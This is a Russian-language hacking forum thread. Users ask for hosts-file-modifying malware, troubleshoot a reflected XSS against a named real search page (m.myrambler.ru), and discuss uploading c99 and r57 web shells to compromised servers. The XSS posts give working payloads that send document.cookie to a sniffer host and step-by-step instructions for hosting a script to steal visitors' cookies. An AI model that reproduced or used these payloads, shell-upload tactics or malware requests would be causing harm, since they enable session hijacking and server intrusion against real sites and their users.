есть у когонибудь файлы вируса который правит этот файл -"C:\WINDOWS\system32\drivers\etc\hosts" если не трудно скинте ссылку где скачать можно...или как самому написать такой... вобщем интересует всё по этой теме...буду рад любой помощи...
PHP: http://m.myrambler.ru/search.php?pagelen=10&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Вот это работает. А когда ставлю ссылку из сниффера, тогда не работает. mailbrush прав, если значение поисков нету тогда и xss нету, дело в том что в значениях поиска нет ссылки из сниффера, а раза "><script>alert('xss')</script> есть, поэтому xss как "><script>alert('xss')</script> действует, а ссылка из сниффера не действует,
Если я напишу Google, выдача поиска будет, но XSS нет. А если же Code: google "><script>img = new Image(); img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;</script> не будет выдачи, т.к. поиск ничего не найдет. И опять советуешь не проверяя... Оператора OR нету в рамблере, и при чем здесь яша? В коде + нужен как плюс, а не пробел! Ты конкатезируешь Code: http://httpz.ru/ndemo.gif? и куки. Cehennem, зарегай себе хост, к примеру sdagsfhfh.ru, залей файлик script.js по адресу Code: http://sdagsfhfh.ru/script.js с содержанием Code: img = new Image(); img.src = "http://httpz.ru/ndemo.gif?"+document.cookie; Дальше заходи Code: http://m.myrambler.ru/search.php?pagelen=10&query="><script src="http://sdagsfhfh.ru/script.js"></script> Потом на сниффер И ты увидишь стыренные куки...
У меня вопросик. есть сайтик...открыт 88 порт. там открыты две дерриктория одна админка...во второй фаил httacces - читаемый. можно туда шшел впарить. За ссылкой сайта пишите в личку.
такая беда,залил шелл, сервер : 2003 + wampserver,но файлы шелл (с99) заливать не хочет выбивает и все,на линусах некторых тоже такая фигня поскакивает, не буду же каждый раз я через админку все грузить,какие причины этого? спасибо!
просто может быть причина в том что он закодирован и как то этим фильтруется, поэтому в инете есть куча шеллов не кодированых, пробуй их
Ээээ ? "закодирован и как то этим фильтруется" -- что это должно означать? Чем "этим" и кто "он" фильтруется, и как по причине "закодирования" может не работать заливка файлов?
я не знаю ,но на один серв когда я лил ,с99, то он у меня не лился, сам не понимал что да как , а когда залил не закодированный шелл то он залился
На винде есть прова на чтение запись практиски куда угодно,а вод под никсом одним и r57 не аплоадит,там сборка 1 апреля этого года,вообще не знаю чего думать,перепробовал все папки где есть прова (копи-пастил его) и пофик p.s создать файл не катит,их надо больше штуки содавать это бывает когда ты льешь с подменой расширения